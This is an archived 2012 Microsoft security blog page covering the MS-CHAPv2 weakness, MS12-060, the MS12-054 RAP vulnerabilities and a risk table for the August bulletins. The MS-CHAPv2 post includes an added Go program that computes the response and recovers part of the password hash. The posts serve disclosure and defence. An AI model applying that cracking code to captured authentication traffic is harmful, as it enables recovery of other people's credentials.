Security Research & Defense

Information from Microsoft about vulnerabilities, mitigations and workarounds, active attacks, security research, tools and guidance

August, 2012

  • Weaknesses in MS-CHAPv2 authentication

    MS-CHAP is the Microsoft version of the Challenge-Handshake Authentication Protocol and is described in RFC 2759.  A recent presentation by Moxie Marlinspike [1] has revealed a breakthrough which reduces breaking MS-CHAPv2 to a single DES key search (2^56 operations) regardless of the password length.  Today, we published Security Advisory 2743314 with recommendations to mitigate the effects of this issue.

    Any potential attack requires a man-in-the-middle position in which a third party can capture all the traffic between the client and the authenticator during authentication.

    Without going into much detail about the MS-CHAPv2 protocol, we will just discuss the part that would be affected by this type of attack: the challenge and response authentication.  This is how the client responds to the challenge sent by the authenticator:

    • The authenticator sends a 16-byte challenge: CS
    • The client generates a 16-byte challenge: CC
    • The client hashes the client challenge, the authenticator challenge and the username with SHA-1 and keeps the first 8 bytes of the digest: C
    • The client hashes the password with MD4: H (the NT hash)
    • The client pads H with 5 null bytes to obtain a 21-byte block and splits it into three 7-byte DES keys: K1, K2, K3
    • The client encrypts the block C with each of K1, K2 and K3 and concatenates the results to create the 24-byte response: R
    • The client sends back R, CC and the username (C itself is not sent, but anyone who sees CS, CC and the username can recompute it)

    Or:

    C = SHA1(CC | CS | UNAME)[0..7]             (first 8 bytes of the digest, per RFC 2759)
    P = MD4(PASSWORD)                           (16 bytes)
    K1 | K2 | K3 = P | 5 bytes of 0             (21 bytes, three 7-byte DES keys)
    R = DES(K1, C) | DES(K2, C) | DES(K3, C)    (24 bytes)

    There are several issues in this algorithm that combined together can result in the success of this type of attack.

    First, every element of the challenge and response except the MD4 hash of the password is either sent in the clear over the wire (CS, CC, the username and R) or can be computed from those values (C). For a man-in-the-middle attacker this means that recovering the password hash is enough to re-authenticate as the user: the hash is the actual secret, and the password itself never needs to be recovered.

    Secondly, the key derivation is particularly weak. Padding the 16-byte hash with 5 bytes of zero means that only the first two bytes of the last DES key K3 are unknown, so K3 has a key space of just 2^16. It is recovered almost instantly and gives the attacker the last two bytes of the hash.

    Lastly, the same plaintext C is encrypted with K1 and K2. A single exhaustive search of the 2^56 DES key space can therefore compare each candidate key's encryption of C against both DES(K1, C) and DES(K2, C) at once, so one search, not two, recovers both keys and with them the first 14 bytes of the hash.

    Once the attacker has K1, K2 and K3, he has the complete MD4 hash of the password, which is enough to re-authenticate.
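    The computation above, together with the two cheap parts of the attack (the 2^16 search for K3, and the shared-plaintext check that lets one 2^56 pass recover K1 and K2 together), as an added example in Go that is not part of the original post or of any Microsoft code. It follows the ChallengeHash, DesEncrypt and ChallengeResponse routines of RFC 2759 using only the Go standard library, and takes the NT hash as input instead of computing MD4 of the password. The challenges, username and NT hash are constructed sample values, not real traffic. The 2^56 search itself is not run; checkCandidate is the per-key step such a search would execute.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"fmt"
	"math/bits"
)

// challengeHash is ChallengeHash() from RFC 2759: the first 8 bytes of
// SHA1(PeerChallenge || AuthenticatorChallenge || UserName). This is the block C.
func challengeHash(peerChallenge, authChallenge []byte, username string) []byte {
	h := sha1.New()
	h.Write(peerChallenge)
	h.Write(authChallenge)
	h.Write([]byte(username))
	return h.Sum(nil)[:8]
}

// desKey expands a 7-byte (56-bit) key into the 8-byte form DES expects, with an
// odd-parity bit as the low bit of each byte. DES ignores the parity bits.
func desKey(k7 []byte) []byte {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	out := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		b := byte(v&0x7f) << 1
		if bits.OnesCount8(b)%2 == 0 {
			b |= 1
		}
		out[i] = b
		v >>= 7
	}
	return out
}

// desEncryptBlock is DesEncrypt() from RFC 2759: one DES block under a 7-byte key.
func desEncryptBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(desKey(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntResponse is ChallengeResponse() from RFC 2759: the 16-byte NT hash is padded
// with five zero bytes, split into three 7-byte DES keys, and each key encrypts C.
func ntResponse(ntHash, c []byte) []byte {
	padded := make([]byte, 21)
	copy(padded, ntHash) // padded[16:21] stays zero
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncryptBlock(padded[7*i:7*i+7], c)...)
	}
	return resp
}

// recoverK3 brute-forces the third response block. Only the first two bytes of K3
// come from the hash; the other five are zero padding, so 2^16 DES operations suffice.
func recoverK3(c, block3 []byte) ([]byte, bool) {
	k := make([]byte, 7) // k[2:7] is the known zero padding
	for guess := 0; guess < 1<<16; guess++ {
		binary.BigEndian.PutUint16(k[:2], uint16(guess))
		if bytes.Equal(desEncryptBlock(k, c), block3) {
			return append([]byte(nil), k[:2]...), true
		}
	}
	return nil, false
}

// checkCandidate is the per-key step of the remaining 2^56 search: one encryption of C
// compared against both the K1 and the K2 block, since both keys encrypt the same C.
func checkCandidate(k7, c, response []byte) (matchesK1, matchesK2 bool) {
	ct := desEncryptBlock(k7, c)
	return bytes.Equal(ct, response[0:8]), bytes.Equal(ct, response[8:16])
}

func main() {
	// Constructed sample values, not captured traffic; the NT hash is arbitrary.
	authChallenge := bytes.Repeat([]byte{0x5a}, 16)
	peerChallenge := bytes.Repeat([]byte{0xa5}, 16)
	ntHash := []byte{0x3f, 0x88, 0x2e, 0xd7, 0x49, 0x3a, 0x1b, 0xc0, 0x55, 0x67, 0xe1, 0x1d, 0x92, 0x0c, 0xab, 0x74}
	c := challengeHash(peerChallenge, authChallenge, "alice")
	resp := ntResponse(ntHash, c)
	fmt.Printf("C           = %x\nNT-Response = %x\n", c, resp)
	// Attacker's view: CS, CC, the username and R were all on the wire, so C is known.
	k3, ok := recoverK3(c, resp[16:24])
	fmt.Printf("K3 from 2^16 search = %x (found=%v, equals hash[14:16]=%v)\n", k3, ok, bytes.Equal(k3, ntHash[14:16]))
	m1, m2 := checkCandidate(ntHash[0:7], c, resp)
	fmt.Printf("candidate hash[0:7]: matches K1=%v, K2=%v\n", m1, m2)
}
```

    Running the file prints C, the 24-byte NT-Response, the two hash bytes recovered from K3 and which response slot the first seven hash bytes match. RFC 2759 also contains official test vectors that an implementation of these routines can be checked against.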

    - Ali Rahbar, MSRC Engineering

    [1]- https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/

  • MS12-060: Addressing a vulnerability in MSCOMCTL.OCX's TabStrip control

    Today we released MS12-060, addressing a potential remote code execution vulnerability in MSCOMCTL.OCX, the binary included with a number of Microsoft products to provide a set of common ActiveX controls.

    Limited, targeted attacks exploiting CVE-2012-1856

    MS12-060 is on the list of high priority updates for this month for two reasons: we are aware of very limited, targeted attacks taking advantage of CVE-2012-1856 and we expect to see new attacks taking advantage of this vulnerability in days ahead. We discovered this vulnerability in a malicious RTF file sent by email which attempted to run an exploit when opened with WordPad or Microsoft Word. Deploying MS12-060 will address the vulnerability and will protect against attacks. So once again we emphasize the urgency of applying this update as soon as possible.

    Comparing MS12-060 to MS12-027 (previous MSCOMCTL bulletin)

    MS12-060 addresses a different vulnerability than the one fixed by the previous MSCOMCTL security update, MS12-027. The previous vulnerability (CVE-2012-0158) was a stack-based buffer overflow affecting both the TreeView and ListView controls. MS12-060 instead fixes a different issue (CVE-2012-1856) caused by an incorrect memory allocation in the code of the TabStrip control. In both cases code execution is possible, but the exploitation methods are very different. We expect attacks exploiting CVE-2012-1856 to be delivered as Office documents, mostly as RTF files, because of the antivirus signature evasion options the RTF format offers, which we observed while tracking the CVE-2012-0158 MSCOMCTL vulnerability.

    Office mitigations against embedded controls

    Microsoft Office includes various on-by-default mitigations and a range of optional security features that, on top of the MS12-060 security update, offer additional layers of protection against suspicious documents with embedded ActiveX controls (such as MSCOMCTL) or other potentially harmful active content. All of these mitigations and protection settings were covered in detail in a previous blog post, available at http://blogs.technet.com/b/srd/archive/2012/04/10/ms12-027-enhanced-protections-regarding-activex-controls-in-microsoft-office-documents.aspx. The protection settings discussed there, such as the Office kill bit and Protected View, are valid defensive measures that will harden Office against similar attacks. The vulnerable CLSID for CVE-2012-1856, and therefore the CLSID to which the Office kill bit should be applied, is 1EFB6596-857C-11D1-B16A-00C0F0283628.

    One more protection layer that we found useful against RTF-based attacks is enabling Protected View for all RTF files from the Office Trust Center (File Block Settings). This simple setting prevents automatic loading of embedded controls and active content in RTF documents. The Trust Center offers two possible configurations: opening RTF files in Protected View with or without editing enabled. Opening the document in Protected View without editing blocks attacks based on embedded controls while still allowing the RTF document to be read, and is a very good safeguard against malicious RTF files with embedded controls.

     

    Deploying EMET to mitigate the risk

    Finally, we noticed that the Enhanced Mitigation Experience Toolkit (EMET) is able to mitigate or neutralize exploitation attempts for this vulnerability and so we encourage customers who want to add an additional layer of protection on top of the MS12-060 security update to consider deploying EMET at least to protect browser programs and Office applications on client machines. EMET 3.0 can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=29851.

    Acknowledgement

    Thanks to Ali Rahbar and Ali Pezeshk from MSRC Engineering for the help investigating this vulnerability.

    - Elia Florio, MSRC Engineering

  • MS12-054: Not all remote, pre-auth vulnerabilities are equally appetizing for worms..

    We released security update MS12-054 to address four privately reported issues in Windows networking components failing to properly handle malformed Remote Administration Protocol (RAP) responses. The most severe of these issues, CVE-2012-1851, is a format string vulnerability in the printer spooler service while handling a response message and is a wormable-class vulnerability on Windows XP and Windows Server 2003. At least, sort of wormable. This blog post will explain the attack scenario and the limited affected platforms to help you assess the risk this vulnerability poses to your environment.

    What is the RAP protocol?

    Windows workgroups and domains maintain a lookup list of network resources such as printers, SQL servers, and file servers. Each time a new resource becomes available (such as a new printer being shared or a SQL Server booting up), the server hosting the resource notifies the subnet’s master browser (or backup browser). Any application or workstation that needs a specific type of resource can then query its subnet’s master browser or backup browser to respond with a list of resources of the requested type. The MSDN NetServerEnum documentation explains how an application can query the subnet browser for network resources and the type of resources available to be queried. Amongst other uses, the Remote Administration Protocol (RAP) is the protocol included with Windows to perform these types of administrative functions. 

    Potential Attack Scenario

    All four vulnerabilities addressed by MS12-054 are client-side parsing issues of malformed RAP responses. To trigger a vulnerability by sending a malicious response, an attacker would need to either act as a subnet’s browser or populate the legitimate master/backup browser’s lookup table with malformed records, which would then be relayed to clients when they request a resource of a certain type. Windows XP users face the most significant risk from these vulnerabilities, as indicated in the affected platforms table at the end of this blog post. A commonly exercised user experience path that initiates a NetServerEnum call (and the subsequent RAP request) is the Windows XP “View workgroup computers” link in the “My Network Places” dialog box.

    [Screenshot: “My Network Places” dialog with the “View workgroup computers” link]

    How is this “wormable”?

    In addition to the "My Network Places" user-initiated scenario above, several "on-by-default" scenarios also exist on Windows XP.  For example, winlogon initiates a request using this protocol to find domain controllers.  The client-side group policy component also initiates RAP requests to which a malicious subnet browser could return a malformed attack response.  CVE-2012-1851, as an example, involves the print spooler service on Windows XP and Windows Server 2003, a service that regularly polls/queries the subnet browser for a list of shared printers.  It would be "wormable" given the following conditions:

    • Victim workstations running Windows XP or Windows Server 2003.
    • Attacker is capable of being elected master browser on the victim’s subnet,
      OR attacker is able to populate the real master browser’s printer list with a malformed record AND the Print Browsing group policy option is enabled on the real master browser.
    • Workstation service (LanmanWorkstation) running on the victim workstation.
    • Print Spooler service running on the victim workstation.

    Every two minutes, the victim’s print spooler service calls the NetServerEnum API to enumerate shared, available printers. This instructs the Workstation service to send a RAP request over SMB to the subnet’s browser. The subnet browser can then send back a malformed response, which is passed to the spooler service and triggers the vulnerability. The flow is: spooler service (every two minutes) -> NetServerEnum -> Workstation service -> RAP request over SMB -> subnet master/backup browser -> malformed RAP response -> spooler service parses it -> vulnerability triggered.

    Affected Platforms

    The affected platforms list is full of good news for customers that have migrated to newer versions of Windows. First, two of the vulnerabilities (CVE-2012-1852 and CVE-2012-1853) affect only Windows XP. The vulnerability affecting the Browser service (CVE-2012-1850) is rated Moderate on Vista and later platforms because the Browser service is off by default starting with Windows Vista. And, finally, the print spooler service code execution vulnerability (CVE-2012-1851) manifests only as a denial-of-service on Windows Vista and does not affect later platforms at all in their default configuration.

    The table below summarizes the risk per platform:

    CVE-2012-1850 (Browser service)
      Windows XP: Denial of service.
      Windows Server 2003: Denial of service.
      Windows Vista: Not affected by default (Browser service disabled).
      Windows 7: Not affected by default (Browser service disabled).
      Windows Server 2008 and Windows Server 2008 R2: Not affected by default (Browser service disabled).

    CVE-2012-1851 (print spooler service)
      Windows XP: Potential code execution as SYSTEM.
      Windows Server 2003: Potential code execution as SYSTEM.
      Windows Vista: Denial of service.
      Windows 7: Not affected by default (Browser service disabled).
      Windows Server 2008 and Windows Server 2008 R2: Not affected by default (Browser service disabled).

    CVE-2012-1852
      Windows XP: Potential code execution as logged-on user or service account, depending on vector.
      Windows Server 2003, Windows Vista, Windows 7, Windows Server 2008 and Windows Server 2008 R2: Not affected.

    CVE-2012-1853
      Windows XP: Potential code execution as logged-on user or service account, depending on vector.
      Windows Server 2003, Windows Vista, Windows 7, Windows Server 2008 and Windows Server 2008 R2: Not affected.

    We hope this information helps you assess the risk of this “sort of wormable” issue in your environment. Please let us know if you have any questions.

    - Jonathan Ness, Neil Sikka, and Gangadhara Swamy, MSRC Engineering

  • Assessing risk for the August 2012 security updates

    Today we released nine security bulletins addressing 26 CVEs (13 Microsoft CVEs and 13 Oracle CVEs). Five of the bulletins have a maximum severity rating of Critical and the other four have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.

    Columns: Bulletin | Most likely attack vector | Max bulletin severity | Max exploitability rating | Likely first 30 days impact | Platform mitigations and key notes

    MS12-060 (Windows Common Controls)
      Most likely attack vector: Attackers have leveraged this vulnerability in limited, targeted attacks by emailing a malicious RTF file to victims. The victim opens the RTF in WordPad or Word, triggering code execution in the context of the logged-on user. The vulnerability could also be triggered by browsing to a malicious webpage.
      Max bulletin severity: Critical
      Max exploitability rating: 1
      Likely first 30 days impact: Limited, targeted attacks in the wild currently.
      Platform mitigations and key notes: See the MS12-060 SRD blog post above for more detail about this specific vulnerability, how it differs from the previous MSCOMCTL issue released in April, and the workaround options we recommend to harden against any future vulnerabilities in this component. This vulnerability cannot be triggered from within Outlook's preview pane; the email-based RTF attack vector would require double-clicking the RTF attachment.

    MS12-052 (Internet Explorer)
      Most likely attack vector: Victim browses to a malicious webpage.
      Max bulletin severity: Critical
      Max exploitability rating: 1
      Likely first 30 days impact: Likely to see reliable exploits developed within the next 30 days.

    MS12-054 (Windows Networking Components)
      Most likely attack vector: Attacker on an enterprise network (or after having been elected master browser in a workgroup) makes available a shared resource (such as a printer) with a malformed name. Victim workstations query the master browser for the list of shared resources at each startup and at regular intervals. The malformed attacker name in this list triggers a vulnerability in a service (such as the spooler service) on the victim workstations.
      Max bulletin severity: Critical
      Max exploitability rating: 1
      Likely first 30 days impact: Likely to see reliable exploits developed within the next 30 days.
      Platform mitigations and key notes: Windows Vista and later platforms are affected by default only by the denial-of-service issue, not the code execution vulnerability. See the MS12-054 SRD blog post above for more background on the issue.

    MS12-058 (Oracle Outside In for Exchange)
      Most likely attack vector: Attacker sends an email with a malicious attachment and lures the victim into viewing the attachment as a webpage within Outlook Web Access. The attacker could potentially compromise the server-side process generating the web page.
      Max bulletin severity: Critical
      Max exploitability rating: 1
      Likely first 30 days impact: Likely to see reliable exploits developed within the next 30 days.
      Platform mitigations and key notes: The Oracle Outside In process runs at a lower privilege level, LocalService. For more background information, please see the SRD blog post on MS12-058.

    MS12-053 (Terminal Services)
      Most likely attack vector: Attacker sends a malicious Remote Desktop Protocol (RDP) request to a Windows XP victim running Terminal Services, potentially executing code as SYSTEM before authentication is required.
      Max bulletin severity: Critical
      Max exploitability rating: 2
      Likely first 30 days impact: Less likely to see a reliable exploit developed in the next 30 days.
      Platform mitigations and key notes: Affects only Windows XP workstations that have enabled Remote Desktop.

    MS12-055 (Windows drivers [win32k.sys])
      Most likely attack vector: Attacker already running code on a machine elevates from a low-privileged account to SYSTEM.
      Max bulletin severity: Important
      Max exploitability rating: 1
      Likely first 30 days impact: Likely to see an exploit released granting a local attacker SYSTEM level access.

    MS12-059 (Visio)
      Most likely attack vector: Victim opens a malicious Visio .DXF file.
      Max bulletin severity: Important
      Max exploitability rating: 1
      Likely first 30 days impact: Visio exploits are not often seen in the wild. Unsure whether we will see an exploit released.
      Platform mitigations and key notes: Visio is not installed by default with most Office installations.

    MS12-056 (JScript, VBScript)
      Most likely attack vector: Victim browses to a malicious webpage using 64-bit Internet Explorer on a 64-bit system with more than 8 GB of RAM.
      Max bulletin severity: Important
      Max exploitability rating: 2
      Likely first 30 days impact: Less likely to see a reliable exploit developed in the next 30 days.
      Platform mitigations and key notes: Only 64-bit versions of Internet Explorer running on 64-bit systems with more than 8 GB of RAM are affected.

    MS12-057 (Office)
      Most likely attack vector: Victim opens a malicious Office document containing a corrupted CGM file.
      Max bulletin severity: Important
      Max exploitability rating: 3
      Likely first 30 days impact: Unlikely to see a reliable exploit developed in the next 30 days.
      Platform mitigations and key notes: The CGM graphics filter was disabled with MS10-105. This security update addresses an upgrade scenario in which the graphics filter was not properly disabled.

    In addition to the nine new security bulletins, we have re-released MS12-043 to make available a security update for Microsoft XML Core Services 5.0 that was unavailable at the time of initial release.

    Finally, we have also released a new security advisory, KB 2661254, to inform customers of an update available on the Download Center that restricts the use of certificates with RSA keys shorter than 1024 bits. The advisory announces that we plan to release this update through Microsoft Update in October 2012, after customers have had a chance to evaluate their environments with the update and take any actions needed to move to certificates with RSA keys of 1024 bits or longer.

    - Jonathan Ness, MSRC Engineering